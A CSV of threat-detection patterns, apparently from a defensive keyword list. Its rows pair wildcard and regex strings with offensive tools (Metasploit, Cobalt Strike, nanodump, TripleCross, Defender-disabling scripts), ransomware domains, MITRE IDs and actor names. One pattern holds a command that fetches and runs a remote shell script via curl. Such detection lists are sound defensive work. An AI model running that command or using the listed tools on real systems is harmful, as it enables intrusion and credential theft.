"*sokaRepo/CoercedPotatoRDLL*",".{0,1000}sokaRepo\/CoercedPotatoRDLL.{0,1000}","offensive_tool_keyword","CoercedPotatoRDLL","Reflective DLL to privesc from NT Service to SYSTEM using SeImpersonateToken privilege","T1055 - T1134 - T1548","TA0004 - TA0003 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/sokaRepo/CoercedPotatoRDLL","1","1","N/A","N/A","10","3","204","31","2023-11-23T18:58:41Z","2023-11-23T13:22:38Z","59872" "*Soledge/BlockEtw*",".{0,1000}Soledge\/BlockEtw.{0,1000}","offensive_tool_keyword","BlockEtw",".Net Assembly to block ETW telemetry in current process","T1055.001 - T1562.001","TA0005","N/A","N/A","Defense Evasion","https://github.com/Soledge/BlockEtw","1","1","N/A","N/A","10","1","78","19","2020-05-14T19:24:49Z","2020-05-14T02:40:50Z","59881" "*something.wattahog.org*",".{0,1000}something\.wattahog\.org.{0,1000}","offensive_tool_keyword","dnschef-ng","DNSChef is a highly configurable DNS proxy for Penetration Testers and Malware Analysts. A DNS proxy (aka ""Fake DNS"") is a tool used for application network traffic analysis among other uses. 
For example - a DNS proxy can be used to fake requests for ""badguy.com"" to point to a local machine for termination or interception instead of a real host somewhere on the Internet.","T1568 - T1583 - T1071","TA0001 - TA0042 - TA0005","N/A","N/A","Sniffing & Spoofing","https://github.com/byt3bl33d3r/dnschef-ng","1","1","N/A","N/A","8","2","153","14","2023-11-26T06:57:04Z","2021-12-24T21:07:29Z","59884" "*sonarmsng5vzwqezlvtu2iiwwdn3dxkhotftikhowpfjuzg7p3ca5eid.onion*",".{0,1000}sonarmsng5vzwqezlvtu2iiwwdn3dxkhotftikhowpfjuzg7p3ca5eid\.onion.{0,1000}","offensive_tool_keyword","ransomware_notes","detection patterns retrieved in ransomware notes archives","T1486","TA0040","N/A","N/A","Ransomware","https://github.com/threatlabz/ransomware_notes","1","1","N/A","N/A","10","4","354","55","2025-04-04T19:06:04Z","2022-08-01T15:14:59Z","59885" "*sondr5344ygfweyjbfkw4fhsefv.heliofetch.at*",".{0,1000}sondr5344ygfweyjbfkw4fhsefv\.heliofetch\.at.{0,1000}","offensive_tool_keyword","ransomware_notes","detection patterns retrieved in ransomware notes archives","T1486","TA0040","N/A","N/A","Ransomware","https://github.com/threatlabz/ransomware_notes","1","1","N/A","N/A","10","4","354","55","2025-04-04T19:06:04Z","2022-08-01T15:14:59Z","59886" "*souravbaghz/RadareEye*",".{0,1000}souravbaghz\/RadareEye.{0,1000}","offensive_tool_keyword","RadareEye","Tool for especially scanning nearby devices and execute a given command on its own system while the target device comes in range.","T1125 - T1071 - T1105 - T1057","TA0010 - TA0002 - TA0007","N/A","N/A","Lateral Movement","https://github.com/souravbaghz/RadareEye","1","1","N/A","N/A","N/A","4","364","49","2021-12-11T06:16:37Z","2021-01-07T04:52:58Z","59887" "*source <(curl -SsfL https://thc.org/hs)*",".{0,1000}source\s\<\(curl\s\-SsfL\shttps\:\/\/thc\.org\/hs\).{0,1000}","offensive_tool_keyword","hackshell","Make BASH stealthy and hacker friendly with lots of bash functions","T1070.003 - T1059.004 - T1564.001 - T1070.004","TA0005 - 
TA0002","N/A","N/A","Defense Evasion","https://github.com/hackerschoice/hackshell","1","0","N/A","N/A","9","3","251","28","2025-04-21T11:23:41Z","2024-07-16T15:56:11Z","59888" "*source physmem2profit*",".{0,1000}source\sphysmem2profit.{0,1000}","offensive_tool_keyword","physmem2profit","Physmem2profit can be used to create a minidump of a target hosts' LSASS process by analysing physical memory remotely","T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/WithSecureLabs/physmem2profit","1","0","N/A","N/A","10","5","415","74","2022-07-27T03:33:59Z","2020-02-14T08:34:27Z","59889" "*source/avetsvc.c*",".{0,1000}source\/avetsvc\.c.{0,1000}","offensive_tool_keyword","avet","AVET is an AntiVirus Evasion Tool. which was developed for making life easier for pentesters and for experimenting with antivirus evasion techniques. as well as other methods used by malicious software. For an overview of new features in v2.3. as well as past version increments. have a look at the CHANGELOG file.","T1055 - T1027 - T1566","TA0002 - TA0003 - TA0008","N/A","N/A","Defense Evasion","https://github.com/govolution/avet","1","0","N/A","N/A","10","10","1694","338","2023-10-12T15:00:05Z","2017-01-28T14:56:47Z","59890" "*source/byakugan*",".{0,1000}source\/byakugan.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","FANCY BEAR - EMBER BEAR - Sandworm - Turla - MAZE - LockBit - Bassterlord* - Conti - Hive - Fog - Black Basta - MoneyTaker - INDRIK SPIDER - APT39 - GOLD DUPONT - Common Raven","Framework","https://github.com/rapid7/metasploit-framework","1","1","N/A","N/A","10","10","35400","14272","2025-04-22T20:14:59Z","2011-08-30T06:13:20Z","59891" "*source/dllinject*",".{0,1000}source\/dllinject.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","FANCY BEAR - EMBER BEAR - Sandworm - Turla - MAZE - LockBit - Bassterlord* - Conti - Hive - Fog - Black Basta - MoneyTaker - INDRIK SPIDER - APT39 - GOLD DUPONT - Common Raven","Framework","https://github.com/rapid7/metasploit-framework","1","1","N/A","N/A","10","10","35400","14272","2025-04-22T20:14:59Z","2011-08-30T06:13:20Z","59892" "*source/flash_exploiter*",".{0,1000}source\/flash_exploiter.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","FANCY BEAR - EMBER BEAR - Sandworm - Turla - MAZE - LockBit - Bassterlord* - Conti - Hive - Fog - Black Basta - MoneyTaker - INDRIK SPIDER - APT39 - GOLD DUPONT - Common Raven","Framework","https://github.com/rapid7/metasploit-framework","1","1","N/A","N/A","10","10","35400","14272","2025-04-22T20:14:59Z","2011-08-30T06:13:20Z","59893" "*source/javapayload*",".{0,1000}source\/javapayload.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","FANCY BEAR - EMBER BEAR - Sandworm - Turla - MAZE - LockBit - Bassterlord* - Conti - Hive - Fog - Black Basta - MoneyTaker - INDRIK SPIDER - APT39 - GOLD DUPONT - Common Raven","Framework","https://github.com/rapid7/metasploit-framework","1","1","N/A","N/A","10","10","35400","14272","2025-04-22T20:14:59Z","2011-08-30T06:13:20Z","59894" "*source/psh_exe*",".{0,1000}source\/psh_exe.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","FANCY BEAR - EMBER BEAR - Sandworm - Turla - MAZE - LockBit - Bassterlord* - Conti - Hive - Fog - Black Basta - MoneyTaker - INDRIK SPIDER - APT39 - GOLD DUPONT - Common Raven","Framework","https://github.com/rapid7/metasploit-framework","1","1","N/A","N/A","10","10","35400","14272","2025-04-22T20:14:59Z","2011-08-30T06:13:20Z","59895" "*source/shtinkering.*",".{0,1000}source\/shtinkering\..{0,1000}","offensive_tool_keyword","nanodump","The swiss army knife of LSASS dumping. A flexible tool that creates a minidump of the LSASS process.","T1003.001 - T1003.003","TA0006","N/A","Dispossessor","Credential Access","https://github.com/fortra/nanodump","1","1","N/A","N/A","10","10","1918","249","2024-09-17T22:58:11Z","2021-11-10T18:28:15Z","59896" "*Source\wdextract\*",".{0,1000}Source\\wdextract\\.{0,1000}","offensive_tool_keyword","WDExtract","Extract Windows Defender database from vdm files and unpack it","T1059 - T1005 - T1119","TA0002 - TA0009 - TA0003","N/A","N/A","Defense Evasion","https://github.com/hfiref0x/WDExtract/","1","0","N/A","N/A","8","5","440","61","2020-02-10T06:53:43Z","2019-04-19T17:33:48Z","59897" "*Source\wdextract\zlib\dll_x64\zlibwapi.dll*",".{0,1000}Source\\wdextract\\zlib\\dll_x64\\zlibwapi\.dll.{0,1000}","offensive_tool_keyword","WDExtract","Extract Windows Defender database from vdm files and unpack it","T1059 - T1005 - T1119","TA0002 - TA0009 - TA0003","N/A","N/A","Defense Evasion","https://github.com/hfiref0x/WDExtract/","1","0","N/A","N/A","8","5","440","61","2020-02-10T06:53:43Z","2019-04-19T17:33:48Z","59898" 
"*Source\wdextract\zlib\dll_x86\zlibwapi.dll*",".{0,1000}Source\\wdextract\\zlib\\dll_x86\\zlibwapi\.dll.{0,1000}","offensive_tool_keyword","WDExtract","Extract Windows Defender database from vdm files and unpack it","T1059 - T1005 - T1119","TA0002 - TA0009 - TA0003","N/A","N/A","Defense Evasion","https://github.com/hfiref0x/WDExtract/","1","0","N/A","N/A","8","5","440","61","2020-02-10T06:53:43Z","2019-04-19T17:33:48Z","59899" "*Source\wdextract\zlib\lib\zlibwapi32.lib*",".{0,1000}Source\\wdextract\\zlib\\lib\\zlibwapi32\.lib.{0,1000}","offensive_tool_keyword","WDExtract","Extract Windows Defender database from vdm files and unpack it","T1059 - T1005 - T1119","TA0002 - TA0009 - TA0003","N/A","N/A","Defense Evasion","https://github.com/hfiref0x/WDExtract/","1","0","N/A","N/A","8","5","440","61","2020-02-10T06:53:43Z","2019-04-19T17:33:48Z","59900" "*Source\wdextract\zlib\lib\zlibwapi64.lib*",".{0,1000}Source\\wdextract\\zlib\\lib\\zlibwapi64\.lib.{0,1000}","offensive_tool_keyword","WDExtract","Extract Windows Defender database from vdm files and unpack it","T1059 - T1005 - T1119","TA0002 - TA0009 - TA0003","N/A","N/A","Defense Evasion","https://github.com/hfiref0x/WDExtract/","1","0","N/A","N/A","8","5","440","61","2020-02-10T06:53:43Z","2019-04-19T17:33:48Z","59901" "*SourcePoint*Loader.go*",".{0,1000}SourcePoint.{0,1000}Loader\.go.{0,1000}","offensive_tool_keyword","cobaltstrike","SourcePoint is a C2 profile generator for Cobalt Strike command and control servers designed to ensure evasion.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - 
T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/Tylous/SourcePoint","1","1","N/A","N/A","10","10","1109","156","2025-04-16T17:15:04Z","2021-08-06T20:55:26Z","59903" "*source-teamserver.sh*",".{0,1000}source\-teamserver\.sh.{0,1000}","offensive_tool_keyword","cobaltstrike","Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - 
TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://www.cobaltstrike.com/","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A","59904" "*spacerunner.exe -i *.ps1* -o *.exe*",".{0,1000}spacerunner\.exe\s\-i\s.{0,1000}\.ps1.{0,1000}\s\-o\s.{0,1000}\.exe.{0,1000}","offensive_tool_keyword","SpaceRunner","enables the compilation of a C# program that will execute arbitrary PowerShell code without launching PowerShell processes through the use of runspace.","T1059.001 - T1027","TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/Mr-B0b/SpaceRunner","1","0","N/A","N/A","7","2","195","38","2020-07-26T10:39:53Z","2020-07-26T09:31:09Z","59905" "*SpaceRunner-master.zip*",".{0,1000}SpaceRunner\-master\.zip.{0,1000}","offensive_tool_keyword","SpaceRunner","enables the compilation of a C# program that will execute arbitrary PowerShell code without launching PowerShell processes through the use of runspace.","T1059.001 - T1027","TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/Mr-B0b/SpaceRunner","1","1","N/A","N/A","7","2","195","38","2020-07-26T10:39:53Z","2020-07-26T09:31:09Z","59906" "*spaceshuttle.io.all@gmail.com*",".{0,1000}spaceshuttle\.io\.all\@gmail\.com.{0,1000}","offensive_tool_keyword","DynastyPersist","Linux persistence tool with features like SSH Key Generation - 
Cronjob Persistence - Custom User with Root - RCE Persistence - LKM/Rootkit- Bashrc Persistence - Systemd Service for Root - LD_PRELOAD Privilege Escalation Config - Backdooring Message of the Day / Header and Modifying an Existing Systemd Service","T1055 - T1037 - T1078 - T1547 - T1546 - T1556","TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/Trevohack/DynastyPersist","1","0","#email #linux","N/A","9","2","153","17","2024-05-16T05:19:48Z","2023-08-13T15:05:42Z","59907" "*SpamChannel-main.zip*",".{0,1000}SpamChannel\-main\.zip.{0,1000}","offensive_tool_keyword","SpamChannel","poof emails from any of the +2 Million domains using MailChannels","T1566 - T1566.001","TA0011","N/A","N/A","Sniffing & Spoofing","https://github.com/byt3bl33d3r/SpamChannel","1","1","N/A","N/A","8","4","335","36","2023-09-21T12:25:03Z","2022-12-20T21:31:55Z","59908" "*Spartacus.exe --mode proxy*",".{0,1000}Spartacus\.exe\s\-\-mode\sproxy.{0,1000}","offensive_tool_keyword","Spartacus","Spartacus DLL/COM Hijacking Toolkit","T1574.001 - T1055.001 - T1027.002","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/Accenture/Spartacus","1","0","N/A","N/A","10","10","1037","141","2024-02-01T13:51:09Z","2022-10-28T09:00:35Z","59909" "*Spartacus-main.zip*",".{0,1000}Spartacus\-main\.zip.{0,1000}","offensive_tool_keyword","Spartacus","Spartacus DLL/COM Hijacking Toolkit","T1574.001 - T1055.001 - T1027.002","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/Accenture/Spartacus","1","1","N/A","N/A","10","10","1037","141","2024-02-01T13:51:09Z","2022-10-28T09:00:35Z","59910" "*spartacus-proxy-*.log*",".{0,1000}spartacus\-proxy\-.{0,1000}\.log.{0,1000}","offensive_tool_keyword","Spartacus","Spartacus DLL/COM Hijacking Toolkit","T1574.001 - T1055.001 - T1027.002","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/Accenture/Spartacus","1","0","N/A","N/A","10","10","1037","141","2024-02-01T13:51:09Z","2022-10-28T09:00:35Z","59911" 
"*Spartacus-v2.*-x64.zip*",".{0,1000}Spartacus\-v2\..{0,1000}\-x64\.zip.{0,1000}","offensive_tool_keyword","Spartacus","Spartacus DLL/COM Hijacking Toolkit","T1574.001 - T1055.001 - T1027.002","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/Accenture/Spartacus","1","1","N/A","N/A","10","10","1037","141","2024-02-01T13:51:09Z","2022-10-28T09:00:35Z","59912" "*spartan-conseil/ratchatpt*",".{0,1000}spartan\-conseil\/ratchatpt.{0,1000}","offensive_tool_keyword","ratchatgpt","ratchatpt a tool using openai api as a C2","T1094 - T1071.001","TA0011 - TA0002","N/A","N/A","C2","https://github.com/spartan-conseil/ratchatpt","1","1","N/A","N/A","10","10","16","6","2023-06-09T12:39:00Z","2023-06-09T09:19:10Z","59913" "*spartan-conseil/ratchatpt*",".{0,1000}spartan\-conseil\/ratchatpt.{0,1000}","offensive_tool_keyword","ratchatpt","C2 using openAI API","T1094 - T1071.001","TA0011 - TA0002","N/A","N/A","C2","https://github.com/spartan-conseil/ratchatpt","1","1","N/A","risk of False positive","10","10","16","6","2023-06-09T12:39:00Z","2023-06-09T09:19:10Z","59914" "*Spawn a phantom shell - with pattern-based trigger*",".{0,1000}Spawn\sa\sphantom\sshell\s\-\swith\spattern\-based\strigger.{0,1000}","offensive_tool_keyword","TripleCross","A Linux eBPF rootkit with a backdoor - C2 - library injection - execution hijacking - persistence and stealth capabilities.","T1055 - T1021.005 - T1055.011 - T1055.003 - T1547 - T1574 - T1027 - T1070.004 - T1562.001","TA0002 - TA0003 - TA0005 - TA0011","N/A","N/A","Defense Evasion","https://github.com/h3xduck/TripleCross","1","0","#linux #content","N/A","10","10","1838","232","2024-04-07T02:06:19Z","2021-10-27T17:47:58Z","59915" "*Spawn CoercedPotato as a Reflective DLL*",".{0,1000}Spawn\sCoercedPotato\sas\sa\sReflective\sDLL.{0,1000}","offensive_tool_keyword","CoercedPotatoRDLL","Reflective DLL to privesc from NT Service to SYSTEM using SeImpersonateToken privilege","T1055 - T1134 - T1548","TA0004 - TA0003 - 
TA0005","N/A","N/A","Privilege Escalation","https://github.com/sokaRepo/CoercedPotatoRDLL","1","0","N/A","N/A","10","3","204","31","2023-11-23T18:58:41Z","2023-11-23T13:22:38Z","59916" "*Spawn encrypted pseudo-shell with IP - with *",".{0,1000}Spawn\sencrypted\spseudo\-shell\swith\sIP\s\-\swith\s.{0,1000}","offensive_tool_keyword","TripleCross","A Linux eBPF rootkit with a backdoor - C2 - library injection - execution hijacking - persistence and stealth capabilities.","T1055 - T1021.005 - T1055.011 - T1055.003 - T1547 - T1574 - T1027 - T1070.004 - T1562.001","TA0002 - TA0003 - TA0005 - TA0011","N/A","N/A","Defense Evasion","https://github.com/h3xduck/TripleCross","1","0","#linux #content","N/A","10","10","1838","232","2024-04-07T02:06:19Z","2021-10-27T17:47:58Z","59917" "*Spawn plaintext pseudo-shell with IP - using *",".{0,1000}Spawn\splaintext\spseudo\-shell\swith\sIP\s\-\susing\s.{0,1000}","offensive_tool_keyword","TripleCross","A Linux eBPF rootkit with a backdoor - C2 - library injection - execution hijacking - persistence and stealth capabilities.","T1055 - T1021.005 - T1055.011 - T1055.003 - T1547 - T1574 - T1027 - T1070.004 - T1562.001","TA0002 - TA0003 - TA0005 - TA0011","N/A","N/A","Defense Evasion","https://github.com/h3xduck/TripleCross","1","0","#linux #content","N/A","10","10","1838","232","2024-04-07T02:06:19Z","2021-10-27T17:47:58Z","59918" "*spawn/runshellcode*",".{0,1000}spawn\/runshellcode.{0,1000}","offensive_tool_keyword","cobaltstrike","CrossC2 developed based on the Cobalt Strike framework can be used for other cross-platform system control. CrossC2Kit provides some interfaces for users to call to manipulate the CrossC2 Beacon session. 
thereby extending the functionality of Cobalt Strike.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/CrossC2/CrossC2Kit","1","1","N/A","N/A","10","10","218","37","2023-08-08T19:52:07Z","2022-06-06T07:00:10Z","59919" "*spawn_cmd.dll*",".{0,1000}spawn_cmd\.dll.{0,1000}","offensive_tool_keyword","POC","POC to check for CVE-2020-0796 /SMBGhost Expected outcome: cmd.exe launched with system access","T1210.001 - T1213 - T1212 - T1201","TA0007 - TA0002","N/A","N/A","Exploitation 
tool","https://github.com/ZecOps/CVE-2020-0796-LPE-POC","1","1","N/A","N/A","N/A","3","241","85","2020-04-02T08:01:38Z","2020-03-30T16:06:50Z","59920" "*spawnas * \ HACKER https*",".{0,1000}spawnas\s.{0,1000}\s\\\sHACKER\shttps.{0,1000}","offensive_tool_keyword","conti","Conti is a Ransomware-as-a-Service (RaaS) that was first observed in December 2019. Conti has been deployed via TrickBot and used against major corporations and government agencies particularly those in North America. As with other ransomware families - actors using Conti steal sensitive files and information from compromised networks and threaten to publish this data unless the ransom is paid","T1059.003 - T1486 - T1140 - T1083 - T1490 - T1106 - T1135 - T1027 - T1057 - T1055.001 - T1021.002 - T1018 - T1489 - T1016 - T1049 - T1080","TA0002 - TA0003 - TA0004 - TA0007 - TA0009 - TA0040","Conti Ransomware","Wizard Spider - Black Basta","Ransomware","https://www.securonix.com/blog/on-conti-ransomware-tradecraft-detection/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","59921" "*SpawnAsAgentManager.cs*",".{0,1000}SpawnAsAgentManager\.cs.{0,1000}","offensive_tool_keyword","RedPeanut","RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.","T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027","TA0002 - TA0003 - TA0004 - TA0011","N/A","N/A","C2","https://github.com/b4rtik/RedPeanut","1","1","N/A","N/A","10","10","328","81","2023-07-07T21:33:22Z","2019-08-22T07:49:50Z","59922" "*spawnasshellcode*",".{0,1000}spawnasshellcode.{0,1000}","offensive_tool_keyword","RedPeanut","RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.","T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027","TA0002 - TA0003 - TA0004 - TA0011","N/A","N/A","C2","https://github.com/b4rtik/RedPeanut","1","1","N/A","N/A","10","10","328","81","2023-07-07T21:33:22Z","2019-08-22T07:49:50Z","59923" 
"*SpawnAsShellcodeManager*",".{0,1000}SpawnAsShellcodeManager.{0,1000}","offensive_tool_keyword","RedPeanut","RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.","T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027","TA0002 - TA0003 - TA0004 - TA0011","N/A","N/A","C2","https://github.com/b4rtik/RedPeanut","1","1","N/A","N/A","10","10","328","81","2023-07-07T21:33:22Z","2019-08-22T07:49:50Z","59924" "*SpawneRv6yTYhShell*",".{0,1000}SpawneRv6yTYhShell.{0,1000}","offensive_tool_keyword","Villain","Villain is a C2 framework that can handle multiple TCP socket & HoaxShell-based reverse shells. enhance their functionality with additional features (commands. utilities etc) and share them among connected sibling servers (Villain instances running on different machines).","T1021 - T1055 - T1071 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/t3l3machus/Villain","1","1","#linux","N/A","10","10","3992","642","2025-01-19T18:37:12Z","2022-10-25T22:02:59Z","59925" "*Spawning registry with TrustedInstaller privileges to delete WdFilter *",".{0,1000}Spawning\sregistry\swith\sTrustedInstaller\sprivileges\sto\sdelete\sWdFilter\s.{0,1000}","offensive_tool_keyword","Disable-TamperProtection","disable TamperProtection and other Defender / MDE components","T1562.001 - T1562.007","TA0005","N/A","N/A","Defense Evasion","https://github.com/AlteredSecurity/Disable-TamperProtection","1","0","N/A","N/A","10","3","208","35","2024-06-06T14:44:59Z","2024-06-05T12:48:56Z","59926" "*Spawning registry with TrustedInstaller privileges to Disable 'DisableIOAVProtection' regkey*",".{0,1000}Spawning\sregistry\swith\sTrustedInstaller\sprivileges\sto\sDisable\s\'DisableIOAVProtection\'\sregkey.{0,1000}","offensive_tool_keyword","Disable-TamperProtection","disable TamperProtection and other Defender / MDE components","T1562.001 - T1562.007","TA0005","N/A","N/A","Defense 
